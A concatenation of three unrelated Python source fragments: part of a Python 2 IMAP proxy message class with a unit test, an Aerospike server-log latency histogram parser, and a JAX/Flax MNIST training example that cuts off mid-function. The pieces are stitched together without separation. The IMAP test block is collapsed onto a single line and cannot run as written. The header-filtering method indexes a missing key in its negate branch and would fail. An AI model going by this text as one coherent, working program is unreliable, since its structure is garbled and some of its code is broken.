        results = {}
        for name in names:
            if self.headers.has_key(name):
                if not negate:
                    results[name] = self.headers[name]
            else:
                if negate:
                    results[name] = self.headers[name]
        if ALLVERBOSE or VERBOSE:
            print results
        return results

    def getBodyFile(self):
        """Retrieve a file object containing only the body of this message.
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getBodyFile" % self.uid
        return StringIO(self.body)

    def getSize(self):
        """Retrieve the total size, in octets, of this message.

        @rtype: C{int}
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getSize()" % self.uid
        # +4 restores the '\r\n\r\n' separator stripped out in update()
        result = len(self.raw_headers) + len(self.body) + 4
        if ALLVERBOSE or VERBOSE:
            print result
        return result

    def isMultipart(self):
        """Indicate whether this message has subparts.

        Implemented as a substring scan of the raw header block for
        "multipart" (case-sensitive).

        @rtype: C{bool}
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].isMultipart" % self.uid
        return self.raw_headers.__contains__("multipart")

    def getSubPart(self,part):
        """Retrieve a MIME sub-message

        @type part: C{int}
        @param part: The number of the part to retrieve, indexed from 0.

        @raise IndexError: Raised if the specified part does not exist.
        @raise TypeError: Raised if this message is not multipart.

        @rtype: Any object implementing C{IMessagePart}.
        @return: The specified sub-part.
        """
        # Always raises: subpart handling is unimplemented.
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getSubPart(%s)" % (self.uid, part)
        raise IndexError("subparts are not yet implimented")

    def getUID(self):
        """Retrieve the unique identifier associated with this message.
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getUID" % self.uid
            print self.uid
        return self.uid

    def getFlags(self):
        """Retrieve the flags associated with this message.

        @rtype: C{iterable}
        @return: The flags, represented as strings.
        """
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getFlags" % self.uid
            print self.flags
        return self.flags

    def getInternalDate(self):
        """Retrieve the date internally associated with this message.

        Delegates to the parsed 'DATE' header; raises KeyError when the
        message has no Date header.

        @rtype: C{str}
        @return: An RFC822-formatted date string.
        """
        result = self.getHeader('DATE')
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getInternalDate" % self.uid
            print result
        return result

    def getHeader(self,key):
        # Direct dict access — raises KeyError for a missing header name.
        result = self.headers[key]
        if ALLVERBOSE or VERBOSE:
            print "ImapProxyMessage[%s].getHeader(%s)" % (self.uid, key)
            print result
        return result


#|##############################################################################
#|Test Suite
#|##############################################################################

import unittest

class TestImapProxyMessage(unittest.TestCase):

    def test_parseHeaders(self):
        RFC822_RAW_DATA = """FCC: imap://whysean@localhost/Sent\r\nX-Identity-Key: id1\r\nMessage-ID: <49DA2F1E.8000701@gmail.com>\r\nDate: Mon, 06 Apr 2009 12:34:38 -0400\r\nFrom: Green Span Test <green.span.test@gmail.com>\r\nX-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0\r\nUser-Agent: Thunderbird 2.0.0.21 (Windows/20090302)\r\nMIME-Version: 1.0\r\nTo: whysean@gmail.com\r\nSubject: test\r\nContent-Type: text/html; charset=ISO-8859-1\r\nContent-Transfer-Encoding: 
7bit""" EXPECTED_RESULTS = {'FCC':'imap://whysean@localhost/Sent', 'X-IDENTITY-KEY':'id1', 'MESSAGE-ID':'<49DA2F1E.8000701@gmail.com>', 'DATE':'Mon, 06 Apr 2009 12:34:38 -0400', 'FROM':'Green Span Test <green.span.test@gmail.com>', 'X-MOZILLA-DRAFT-INFO':'internal/draft; vcard=0; receipt=0; uuencode=0', 'USER-AGENT':'Thunderbird 2.0.0.21 (Windows/20090302)', 'MIME-VERSION':'1.0', 'TO':'whysean@gmail.com', 'SUBJECT':'test', 'CONTENT-TYPE':'text/html; charset=ISO-8859-1', 'CONTENT-TRANSFER-ENCODING':'7bit' } EXPECTED_BODY = """<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">\r\n<html>\r\n<head>\r\n</head>\r\n<body bgcolor="#ffffff" text="#000000">\r\ntest\r\n</body>\r\n</html>\r\n\r\n""" results = ImapProxyMessage._parseHeaders(None,RFC822_RAW_DATA) if ALLVERBOSE or VERBOSE: print "TestImapProxyMessage.test_parseHeaders" print results self.assertEqual(results,EXPECTED_RESULTS) #|############################################################################## #|Shell Executtion #|############################################################################## import sys if __name__=='__main__': unittest.main()
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
####

# ===========================================================
# Imports
#

import datetime
import re

from lib.utils import constants

from . import util

# ===========================================================
# Constants
#

DT_TO_MINUTE_FMT = "%b %d %Y %H:%M"
DT_TIME_FMT = "%H:%M:%S"
HIST_TAG_PREFIX = "histogram dump: "
HIST_WITH_NS_PATTERN = "{.+}-[a-zA-Z0-9_-]+"
HIST_TAG_PATTERNS = [HIST_TAG_PREFIX + "%s ", HIST_TAG_PREFIX + "{[a-zA-Z0-9_-]+}-%s "]
NS_HIST_TAG_PATTERNS = [HIST_TAG_PREFIX + "{%s}-%s "]
NS_SLICE_SECONDS = 5
SCAN_SIZE = 1024 * 1024
HIST_BUCKET_LINE_SUBSTRING = "hist.c:"
SIZE_HIST_LIST = ["device-read-size", "device-write-size"]
COUNT_HIST_LIST = ["query-rec-count"]

# Unit map
UNITS_MAP = {"msec": "ms", "usec": "\u03bcs"}

# relative stats to input histogram
# format:
# histogram: (
#   [in order path for stat with stat name],
#   [(index of value, "name of output column")]
# )
relative_stat_info = {"batch-index": (["batch-sub:", "read"], [(0, "recs/sec")])}

# ===========================================================


class LogLatency(object):
    """Computes per-time-slice latency percentages from histogram dumps
    found in an Aerospike server log, driven by a log-reader object that
    yields (timestamp, line) pairs."""

    def __init__(self, reader):
        self.reader = reader

    # ------------------------------------------------
    # Set bucket details.
    #
    def _set_bucket_details(self, hist):
        # Size histograms bucket by byte size (2^b bytes), count histograms
        # by record count; everything else is a latency histogram.
        if any(ht in hist for ht in SIZE_HIST_LIST):
            self._bucket_labels = (
                "00", "01", "02", "03", "04", "05", "06", "07", "08", "09",
                "10", "11", "12", "13", "14", "15", "16", "17", "18", "19",
                "20", "21", "22", "23", "24", "25",
            )
            self._all_buckets = len(self._bucket_labels)
            self._bucket_unit = "bytes"
        elif any(ht in hist for ht in COUNT_HIST_LIST):
            self._bucket_labels = (
                "00", "01", "02", "03", "04", "05", "06", "07", "08", "09",
                "10", "11", "12", "13", "14", "15", "16", "17", "18", "19",
                "20", "21", "22", "23", "24", "25",
            )
            self._all_buckets = len(self._bucket_labels)
            self._bucket_unit = "records"
        else:
            self._bucket_labels = (
                "00", "01", "02", "03", "04", "05", "06", "07", "08",
                "09", "10", "11", "12", "13", "14", "15", "16",
            )
            self._all_buckets = len(self._bucket_labels)
            # histogram bucket units are set on a per line basis

    # ------------------------------------------------
    # Read a complete line from the log file.
    #
    def _read_line(self, file_itr):
        """Return the next non-empty line from the iterator, or None on
        exhaustion/error."""
        line = ""
        try:
            tm, line = next(file_itr)
            if not line:
                return None
            return line
        except Exception:
            return None

    # ------------------------------------------------
    # Parse a histogram total from a log line.
    #
    def _parse_total_ops(self, line):
        # Lines look like "... (<N> total)".
        return int(line[line.rfind("(") + 1 : line.rfind(" total)")])

    # ------------------------------------------------
    # Get one set of bucket values.
    #
    def _read_bucket_values(self, line, file_itr):
        """Read the bucket-count lines following a histogram header.

        Returns (total, values_by_bucket, next_line); (0, 0, 0) signals an
        incomplete dump."""
        values = {}
        for b in range(self._all_buckets):
            values[b] = 0
        total = self._parse_total_ops(line)
        line = self._read_line(file_itr)
        if not line:
            return 0, 0, 0
        b_min = 0
        b_total = 0
        while True:
            found = 0
            if HIST_BUCKET_LINE_SUBSTRING in line:
                for b in range(b_min, self._all_buckets):
                    pattern = r".*?\(" + self._bucket_labels[b] + r": (.*?)\).*?"
                    r = re.compile(pattern)
                    if r.search(line):
                        found = found + 1
                        values[b] = int(r.search(line).group(1))
                        b_total = b_total + values[b]
            # NOTE(review): a line contributing no new buckets ends the dump —
            # confirm against upstream asadm source whether non-bucket lines
            # mid-dump should instead be skipped.
            if found == 0:
                break
            line = self._read_line(file_itr)
            if not line:
                if b_total < total:
                    # Incomplete bucket details
                    return 0, 0, 0
                else:
                    line = 0
                    break
            if b_total >= total:
                break
            b_min = b_min + found
        return total, values, line

    # ------------------------------------------------
    # Subtract one set of bucket values from another.
    #
    def _subtract_buckets(self, new_values, old_values):
        slice_values = {}
        for b in range(self._all_buckets):
            # Clamp: counters should be monotonic; a decrease means a restart.
            if new_values[b] < old_values[b]:
                new_values[b] = old_values[b]
            slice_values[b] = new_values[b] - old_values[b]
        return slice_values

    # ------------------------------------------------
    # Add one set of bucket values to another.
    #
    def _add_buckets(self, b1_values, b2_values):
        slice_values = {}
        for b in range(self._all_buckets):
            slice_values[b] = b1_values[b] + b2_values[b]
        return slice_values

    # ------------------------------------------------
    # Get the percentage of operations within every bucket.
    #
    def _bucket_percentages(self, total, values):
        percentages = [0.0] * self._all_buckets
        if total > 0:
            for b in range(self._all_buckets):
                percentages[b] = (float(values[b]) / total) * 100
        return percentages

    # ------------------------------------------------
    # Get the percentage of operations in all buckets > bucket.
    #
    def _percentage_over(self, bucket, percentages):
        percentage = 0.0
        for b in range(self._all_buckets):
            if b > bucket:
                percentage = percentage + percentages[b]
        return percentage

    def ceil_time(self, dt):
        """Round a datetime up to the next 10-second boundary (already-aligned
        values are returned unchanged)."""
        seconds = 10 - (dt.second % 10)
        if seconds == 10:
            return dt
        return dt + datetime.timedelta(0, seconds, -dt.microsecond)

    # -------------------------------------------------
    # Get a stat value from line.
    #
    def _read_stat(self, line, stat=None):
        """Extract integer stat values from a log line using several known
        formats; `stat` is the in-order substring path (last entry is the
        stat name to grep for).

        NOTE: default changed from a shared mutable `[]` to None — behavior
        for callers is unchanged (empty/None both return [] immediately).
        """
        values = []
        if not stat:
            return values
        latency_pattern1 = r"%s (\d+)"
        latency_pattern2 = r"%s \(([0-9,\s]+)\)"
        latency_pattern3 = r"(\d+)\((\d+)\) %s"
        latency_pattern4 = r"%s \((\d+)"
        grep_str = stat[-1]
        m = re.search(latency_pattern1 % (grep_str), line)
        if m:
            values.append(int(m.group(1)))
            return values
        m = re.search(latency_pattern2 % (grep_str), line)
        if m:
            values = [int(x) for x in m.group(1).split(",")]
            return values
        m = re.search(latency_pattern3 % (grep_str), line)
        if m:
            # NOTE(review): no early return here in the original — pattern4 is
            # still tried and may append; preserved as-is.
            values = [int(x) for x in list(m.groups())]
        m = re.search(latency_pattern4 % (grep_str), line)
        if m:
            values.append(int(m.group(1)))
            return values
        return values

    # ------------------------------------------------
    # Add one list of stat values to another.
    #
    def _add_stat_values(self, v1, v2):
        if not v1:
            return v2
        if not v2:
            return v1
        l1 = len(v1)
        l2 = len(v2)
        values = []
        for i in range(max(l1, l2)):
            val = 0
            if i < l1:
                val += v1[i]
            if i < l2:
                val += v2[i]
            values.append(val)
        return values

    # ------------------------------------------------
    # Subtract one list of stat values from another.
    #
    def _subtract_stat_values(self, new_values, old_values):
        values = []
        newl = len(new_values)
        oldl = len(old_values)
        for i in range(max(newl, oldl)):
            if i < newl:
                # next item from new_values
                newval = new_values[i]
                if i < oldl:
                    # item available for same index in old_values
                    values.append(newval - old_values[i])
                else:
                    # item not available for same index in old_values
                    values.append(newval)
            else:
                # item not available in new_values
                # add 0
                values.append(0)
        return values

    # ------------------------------------------------
    # Find max from two lists of stat values.
    #
    def _get_max_stat_values(self, new_values, old_values):
        values = []
        newl = len(new_values)
        oldl = len(old_values)
        for i in range(max(newl, oldl)):
            if i >= newl:
                # no item in new_values
                values.append(old_values[i])
            elif i >= oldl:
                # no item in old_values
                values.append(new_values[i])
            else:
                # items available for index i in both list
                values.append(max(old_values[i], new_values[i]))
        return values

    # ------------------------------------------------
    # Get a histogram at or just after the specified datetime.
    #
    def _read_hist(
        self,
        hist_tags,
        after_dt,
        file_itr,
        line=0,
        end_dt=None,
        before_dt=None,
        read_all_dumps=False,
        relative_stat_path=None,
    ):
        """Scan forward to the first matching histogram dump at/after
        `after_dt` and accumulate its buckets (recursing to merge multiple
        dumps when `read_all_dumps` or a relative-stat path is given).

        Returns (total, values, dump_dt, next_line, stat_values, unit).

        NOTE: `relative_stat_path` default changed from a shared mutable `[]`
        to None — callers passing nothing see identical behavior.
        """
        if relative_stat_path is None:
            relative_stat_path = []
        if not line:
            # read next line
            line = self._read_line(file_itr)
        total = 0
        values = 0
        stat_values = []
        dt = ""
        unit = "msec"
        while True:
            if not line:
                return total, values, 0, 0, stat_values, unit
            dt = self.reader.parse_dt(line)
            if dt < after_dt:
                # ignore lines with timestamp before after_dt
                line = self._read_line(file_itr)
                continue
            if end_dt and dt > end_dt:
                # found line with timestamp after end_dt
                return total, values, dt, line, stat_values, unit
            if before_dt and dt > before_dt:
                # found line with timestamp after before_dt
                return total, values, dt, line, stat_values, unit
            if relative_stat_path and util.contains_substrings_in_order(
                line, relative_stat_path
            ):
                temp_sval = self._read_stat(line, relative_stat_path)
                stat_values = self._add_stat_values(stat_values, temp_sval)
            elif any(re.search(ht, line) for ht in hist_tags):
                break
            line = self._read_line(file_itr)
        # The header line itself names the bucket unit.
        if "usec" in line:
            unit = "usec"
        elif "msec" in line:
            unit = "msec"
        total, values, line = self._read_bucket_values(line, file_itr)
        if not line:
            return 0, 0, 0, 0, stat_values, unit
        if read_all_dumps or relative_stat_path:
            if not before_dt:
                before_dt = dt + datetime.timedelta(seconds=NS_SLICE_SECONDS)
            r_total, r_values, r_dt, line, r_stat_values, _ = self._read_hist(
                hist_tags,
                after_dt,
                file_itr,
                line,
                end_dt,
                before_dt,
                read_all_dumps=read_all_dumps,
                relative_stat_path=relative_stat_path,
            )
            total += r_total
            if r_values:
                values = self._add_buckets(values, r_values)
            if r_stat_values:
                stat_values = self._add_stat_values(stat_values, r_stat_values)
        return total, values, dt, line, stat_values, unit

    # ------------------------------------------------
    # Get a timedelta in seconds.
    #
    def _elapsed_seconds(self, td):
        return td.seconds + (td.days * 24 * 3600)

    # ------------------------------------------------
    # Generate padding.
    #
    def _repeat(self, what, n):
        pad = ""
        for i in range(n):
            pad = pad + what
        return pad

    def compute_latency(
        self,
        arg_log_itr,
        arg_hist,
        arg_slice,
        arg_from,
        arg_end_date,
        arg_num_buckets,
        arg_every_nth,
        arg_rounding_time=True,
        arg_ns=None,
        arg_relative_stats=False,
    ):
        """Generator yielding (slice_timestamp, latency_row_dict) per time
        slice, followed by a final (END_ROW_KEY, avg/max row). Yields
        (None, None) once if the arguments fail sanity checks."""
        latency = {}
        tps_key = ("ops/sec", None)
        latency[tps_key] = {}

        # Sanity-check some arguments:
        if (
            arg_hist is None
            or arg_num_buckets < 1
            or arg_every_nth < 1
            or not arg_slice
        ):
            yield None, None
        else:
            # Set buckets
            self._set_bucket_details(arg_hist)
            slice_timedelta = arg_slice
            max_bucket = 0
            # sometimes slice timestamps are not perfect, there might be some delta
            if slice_timedelta > self.reader.parse_timedelta("1"):
                slice_timedelta -= self.reader.parse_timedelta("1")

            # Find index + 1 of last bucket to display:
            for b in range(self._all_buckets):
                if b % arg_every_nth == 0:
                    max_bucket = b + 1
                    if arg_num_buckets == 1:
                        break
                    else:
                        arg_num_buckets = arg_num_buckets - 1
            file_itr = arg_log_itr

            # By default reading one bucket dump for 10 second slice,
            # In case of multiple namespaces, it will read all bucket dumps
            # for all namespaces for same slice
            read_all_dumps = False

            # Set histogram tag:
            if arg_ns:
                # Analysing latency for histogram arg_hist for specific
                # namespace arg_ns. It needs to read single bucket dump for
                # a slice.
                hist_tags = [s % (arg_ns, arg_hist) for s in NS_HIST_TAG_PATTERNS]
            elif re.match(HIST_WITH_NS_PATTERN, arg_hist):
                # Analysing latency for specific histogram for specific
                # namespace ({namespace}-histogram). It needs to read single
                # bucket dump for a slice.
                hist_tags = [HIST_TAG_PREFIX + "%s " % (arg_hist)]
            else:
                # Analysing latency for histogram arg_hist.
                # It needs to read all bucket dumps for a slice.
                hist_tags = [s % (arg_hist) for s in HIST_TAG_PATTERNS]
                read_all_dumps = True

            init_dt = arg_from
            relative_stat_path = []
            relative_stat_index = []
            if arg_relative_stats and arg_hist in relative_stat_info:
                info = relative_stat_info[arg_hist]
                relative_stat_path = info[0]
                relative_stat_index = info[1]
                for idx_name in relative_stat_index:
                    latency[(idx_name[1], None)] = {}

            # Find first histogram:
            old_total, old_values, old_dt, line, old_stat_values, _ = self._read_hist(
                hist_tags,
                init_dt,
                file_itr,
                end_dt=arg_end_date,
                read_all_dumps=read_all_dumps,
                relative_stat_path=relative_stat_path,
            )

            if line:
                end_dt = arg_end_date
                labels = []

                # Other initialization before processing time slices:
                which_slice = 0
                after_dt = old_dt + slice_timedelta
                overs, avg_overs, max_overs = (
                    [0.0] * max_bucket,
                    [0.0] * max_bucket,
                    [0.0] * max_bucket,
                )
                total_ops, total_seconds = 0, 0
                max_rate = 0.0
                total_stat_values = [0.0] * len(old_stat_values)
                max_stat_values = [0.0] * len(old_stat_values)

                # Process all the time slices:
                while end_dt > old_dt:
                    (
                        new_total,
                        new_values,
                        new_dt,
                        line,
                        new_stat_values,
                        new_unit,
                    ) = self._read_hist(
                        hist_tags,
                        after_dt,
                        file_itr,
                        line,
                        end_dt=arg_end_date,
                        read_all_dumps=read_all_dumps,
                        relative_stat_path=relative_stat_path,
                    )
                    self._bucket_unit = UNITS_MAP[new_unit]
                    if not new_values:
                        # This can happen in either eof or end of input time
                        # range
                        break

                    # Get the "deltas" for this slice:
                    slice_total = new_total - old_total
                    slice_values = self._subtract_buckets(new_values, old_values)
                    slice_seconds_actual = self._elapsed_seconds(new_dt - old_dt)

                    slice_stat_values = []
                    slice_stat_rates = []
                    if relative_stat_path:
                        slice_stat_values = self._subtract_stat_values(
                            new_stat_values, old_stat_values
                        )
                        slice_stat_rates = [
                            round(float(v) / slice_seconds_actual, 1)
                            for v in slice_stat_values
                        ]

                    # Get the rate for this slice:
                    rate = round(float(slice_total) / slice_seconds_actual, 1)
                    total_ops = total_ops + slice_total
                    total_seconds = total_seconds + slice_seconds_actual
                    if rate > max_rate:
                        max_rate = rate

                    if relative_stat_path:
                        total_stat_values = self._add_stat_values(
                            total_stat_values, slice_stat_values
                        )
                        max_stat_values = self._get_max_stat_values(
                            max_stat_values, slice_stat_rates
                        )

                    # Convert bucket values for this slice to percentages:
                    percentages = self._bucket_percentages(slice_total, slice_values)

                    # For each (displayed) threshold, accumulate percentages
                    # over threshold:
                    for i in range(max_bucket):
                        if i % arg_every_nth:
                            continue
                        overs[i] = round(self._percentage_over(i, percentages), 2)
                        avg_overs[i] = avg_overs[i] + overs[i]
                        if overs[i] > max_overs[i]:
                            max_overs[i] = overs[i]

                    key_dt = new_dt
                    if arg_rounding_time:
                        key_dt = self.ceil_time(key_dt)
                    for i in range(max_bucket):
                        labels.append(0)
                        if i % arg_every_nth == 0:
                            labels[i] = (2 ** i, self._bucket_unit)
                            latency[(2 ** i, self._bucket_unit)] = {}
                    for i in range(max_bucket):
                        if i % arg_every_nth:
                            continue
                        latency[labels[i]][
                            key_dt.strftime(constants.DT_FMT)
                        ] = "%.2f" % (overs[i])
                    latency[tps_key][key_dt.strftime(constants.DT_FMT)] = "%.1f" % (
                        rate
                    )

                    if relative_stat_index:
                        for idx_name in relative_stat_index:
                            if idx_name[0] < len(slice_stat_rates):
                                latency[(idx_name[1], None)][
                                    key_dt.strftime(constants.DT_FMT)
                                ] = "%.1f" % (slice_stat_rates[idx_name[0]])
                            else:
                                latency[(idx_name[1], None)][
                                    key_dt.strftime(constants.DT_FMT)
                                ] = "-"

                    yield key_dt, latency

                    # Prepare for next slice:
                    for key in latency:
                        latency[key] = {}
                    which_slice = which_slice + 1
                    after_dt = new_dt + slice_timedelta
                    old_total, old_values, old_dt = new_total, new_values, new_dt
                    old_stat_values = new_stat_values

                # Compute averages and maximums:
                if which_slice > 0:
                    for i in range(max_bucket):
                        if i % arg_every_nth == 0:
                            avg_overs[i] = avg_overs[i] / which_slice
                    avg_rate = total_ops / total_seconds
                    avg_stat_values = []
                    if relative_stat_path:
                        avg_stat_values = [
                            v / total_seconds for v in total_stat_values
                        ]
                    for i in range(max_bucket):
                        if i % arg_every_nth:
                            continue
                        latency[labels[i]]["avg"] = "%.2f" % (avg_overs[i])
                        latency[labels[i]]["max"] = "%.2f" % (max_overs[i])
                    latency[tps_key]["avg"] = "%.1f" % (avg_rate)
                    latency[tps_key]["max"] = "%.1f" % (max_rate)

                    if relative_stat_index:
                        for idx_name in relative_stat_index:
                            if idx_name[0] < len(avg_stat_values):
                                latency[(idx_name[1], None)]["avg"] = "%.1f" % (
                                    avg_stat_values[idx_name[0]]
                                )
                            if idx_name[0] < len(max_stat_values):
                                latency[(idx_name[1], None)]["max"] = "%.1f" % (
                                    max_stat_values[idx_name[0]]
                                )

                yield constants.END_ROW_KEY, latency
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Definitions of two versions of MNIST (model and training code).

One definition uses pure JAX (for those who prefer an example with fewer
moving parts, at the expense of code size), and another using Flax.

See README.md for how these are used.
"""
import functools
import logging
import re
import time
from typing import Any, Callable, Optional, Sequence, Tuple

from absl import flags
import flax  # type: ignore[import]
from flax import linen as nn
import jax
import jax.numpy as jnp
from matplotlib import pyplot as plt  # type: ignore
import numpy as np
import tensorflow as tf  # type: ignore
import tensorflow_datasets as tfds  # type: ignore

flags.DEFINE_boolean("mock_data", False, "Use fake data, for testing.")

FLAGS = flags.FLAGS

#### Model parameters

# For fun, let's use different batch sizes for training and for evaluation.
train_batch_size = 128
test_batch_size = 16

# Define common parameters for both the JAX and the Flax models.
input_shape = (28, 28, 1)  # Excluding batch_size
layer_sizes = [784, 512, 512, 10]  # 10 is the number of classes
param_scale = 0.1
step_size = 0.001


def load_mnist(split: tfds.Split, batch_size: int):
  """Loads either training or test MNIST data.

  Args:
    split: either tfds.Split.TRAIN or tfds.Split.TEST.
    batch_size: number of examples per batch; incomplete trailing batches
      are dropped.

  Returns:
    an iterator with pairs (images, labels). The images have shape
    (B, 28, 28, 1) and the labels have shape (B, 10), where B is the
    batch_size.
  """
  if FLAGS.mock_data:
    with tfds.testing.mock_data(num_examples=batch_size):
      try:
        ds = tfds.load("mnist", split=split)
      except Exception as e:
        # tfds.testing.mock_data still needs local metadata files; give the
        # user actionable instructions for where to copy them.
        m = re.search(r'metadata files were not found in (.+/)mnist/', str(e))
        if m:
          msg = ("TFDS mock_data is missing the mnist metadata files. Run the "
                 "`saved_model_main.py` binary and see where TFDS downloads "
                 "the mnist data set (typically ~/tensorflow_datasets/mnist). "
                 f"Copy the `mnist` directory to {m.group(1)} and re-run the test")
          raise ValueError(msg) from e
        else:
          raise e
  else:
    ds = tfds.load("mnist", split=split)

  def _prepare_example(x):
    # Normalize pixel values to [0, 1] and one-hot encode the labels.
    image = tf.cast(x["image"], tf.float32) / 255.0
    label = tf.one_hot(x["label"], 10)
    return (image, label)

  ds = ds.map(_prepare_example)
  # drop_remainder=True is important for use with Keras
  ds = ds.cache().shuffle(1000).batch(batch_size, drop_remainder=True)
  return ds


class PureJaxMNIST:
  """An MNIST model written using pure JAX.

  There is an option for the model to skip the classifier layer, for
  demonstrating reuse of the classifier-less model into a larger model.
  See README.md.
  """
  name = "mnist_pure_jax"

  @staticmethod
  def predict(params: Sequence[Tuple[Any, Any]], inputs, with_classifier=True):
    """The prediction function.

    Args:
      params: a list with pairs of weights and biases for each layer.
      inputs: the batch of images (B, 28, 28, 1)
      with_classifier: whether to include the classifier layer.

    Returns:
      either the predictions (B, 10) if with_classifier=True, or the
      final set of logits of shape (B, 512).
    """
    x = inputs.reshape((inputs.shape[0], -1))  # flatten to f32[B, 784]
    for w, b in params[:-1]:
      x = jnp.dot(x, w) + b
      x = jnp.tanh(x)
    if not with_classifier:
      return x
    final_w, final_b = params[-1]
    logits = jnp.dot(x, final_w) + final_b
    # Return log-probabilities (log-softmax of the logits).
    return logits - jax.scipy.special.logsumexp(
        logits, axis=1, keepdims=True)  # type: ignore[attr-defined]

  @staticmethod
  def loss(params, inputs, labels):
    """Cross-entropy loss: mean negative log-likelihood of the true class."""
    predictions = PureJaxMNIST.predict(params, inputs, with_classifier=True)
    return -jnp.mean(jnp.sum(predictions * labels, axis=1))

  @staticmethod
  def accuracy(predict: Callable, params, dataset):
    """Fraction of examples in `dataset` whose argmax prediction matches."""

    @jax.jit
    def _per_batch(inputs, labels):
      target_class = jnp.argmax(labels, axis=1)
      predicted_class = jnp.argmax(predict(params, inputs), axis=1)
      return jnp.mean(predicted_class == target_class)

    batched = [
        _per_batch(inputs, labels) for inputs, labels in tfds.as_numpy(dataset)
    ]
    # NOTE(review): mean of per-batch means — exact only when all batches
    # have equal size (guaranteed here by drop_remainder=True).
    return jnp.mean(jnp.stack(batched))

  @staticmethod
  def update(params, inputs, labels):
    """One SGD step; returns updated params."""
    grads = jax.grad(PureJaxMNIST.loss)(params, inputs, labels)
    return [(w - step_size * dw, b - step_size * db)
            for (w, b), (dw, db) in zip(params, grads)]

  @staticmethod
  def train(train_ds, test_ds, num_epochs, with_classifier=True):
    """Trains a pure JAX MNIST predictor.

    Returns:
      a tuple with two elements:
        - a predictor function with signature
          "(Params, ImagesBatch) -> Predictions". If `with_classifier=False`
          then the output of the predictor function is the last layer of
          logits.
        - the parameters "Params" for the predictor function
    """
    rng = jax.random.PRNGKey(0)
    # Random init of each layer's (weights, biases), scaled by param_scale.
    params = [(param_scale * jax.random.normal(rng, (m, n)),
               param_scale * jax.random.normal(rng, (n,)))
              for m, n, in zip(layer_sizes[:-1], layer_sizes[1:])]
    for epoch in range(num_epochs):
      start_time = time.time()
      for inputs, labels in tfds.as_numpy(train_ds):
        params = jax.jit(PureJaxMNIST.update)(params, inputs, labels)
      epoch_time = time.time() - start_time
      train_acc = PureJaxMNIST.accuracy(PureJaxMNIST.predict, params, train_ds)
      test_acc = PureJaxMNIST.accuracy(PureJaxMNIST.predict, params, test_ds)
      logging.info("%s: Epoch %d in %0.2f sec", PureJaxMNIST.name, epoch,
                   epoch_time)
      logging.info("%s: Training set accuracy %0.2f%%", PureJaxMNIST.name,
                   100. * train_acc)
      logging.info("%s: Test set accuracy %0.2f%%", PureJaxMNIST.name,
                   100. * test_acc)

    return (functools.partial(
        PureJaxMNIST.predict, with_classifier=with_classifier), params)


class FlaxMNIST:
  """An MNIST model using Flax."""
  name = "mnist_flax"

  class Module(nn.Module):
    """A simple CNN model for MNIST.

    There is an option for the model to skip the classifier layer, for
    demonstrating reuse of the classifier-less model into a larger model.
    See README.md.
    """

    @nn.compact
    def __call__(self, x, with_classifier=True):
      x = nn.Conv(features=32, kernel_size=(3, 3))(x)
      x = nn.relu(x)
      x = nn.avg_pool(x, window_shape=(2, 2), strides=(2, 2))
      x = nn.Conv(features=64, kernel_size=(3, 3))(x)
      x = nn.relu(x)
      x = nn.avg_pool(x, window_shape=(2, 2), strides=(2, 2))
      x = x.reshape((x.shape[0], -1))  # flatten
      x = nn.Dense(features=256)(x)
      x = nn.relu(x)
      if not with_classifier:
        return x
      x = nn.Dense(features=10)(x)
      x = nn.log_softmax(x)
      return x

  # Create the model and save it
  model = Module()

  @staticmethod
  def predict(params, inputs, with_classifier=True):
    return FlaxMNIST.model.apply({"params": params},
                                 inputs,
                                 with_classifier=with_classifier)

  @staticmethod
  def loss(params, inputs, labels):
    # Same as the pure JAX example
    # Must use the classifier layer because the labels are classes
    predictions = FlaxMNIST.predict(params, inputs, with_classifier=True)
    return -jnp.mean(jnp.sum(predictions * labels, axis=1))

  @staticmethod
  def update(optimizer, inputs, labels):
    """One optimizer step; returns the updated optimizer (holds the params)."""
    grad = jax.grad(FlaxMNIST.loss)(optimizer.target, inputs, labels)
    optimizer = optimizer.apply_gradient(grad)
    return optimizer

  @staticmethod
  def train(train_ds, test_ds, num_epochs, with_classifier=True):
    """Trains a Flax MNIST predictor.

    Returns:
      a tuple with two elements:
        - a predictor function with signature
          "(Params, ImagesBatch) -> Predictions". If `with_classifier=False`
          then the output of the predictor function is the last layer of
          logits.
        - the parameters "Params" for the predictor function
    """
    rng = jax.random.PRNGKey(0)
    momentum_mass = 0.9

    init_shape = jnp.ones((1,) + input_shape, jnp.float32)
    initial_params = FlaxMNIST.model.init(rng, init_shape)["params"]
    # NOTE(review): flax.optim was removed in newer Flax releases (replaced
    # by optax); this code pins an older Flax version.
    optimizer_def = flax.optim.Momentum(
        learning_rate=step_size, beta=momentum_mass)
    optimizer = optimizer_def.create(initial_params)

    for epoch in range(num_epochs):
      start_time = time.time()
      for inputs, labels in tfds.as_numpy(train_ds):
        optimizer = jax.jit(FlaxMNIST.update)(optimizer, inputs, labels)
      epoch_time = time.time() - start_time
      # Same accuracy function as for the pure JAX example
      train_acc = PureJaxMNIST.accuracy(FlaxMNIST.predict, optimizer.target,
                                        train_ds)
      test_acc = PureJaxMNIST.accuracy(FlaxMNIST.predict, optimizer.target,
                                       test_ds)
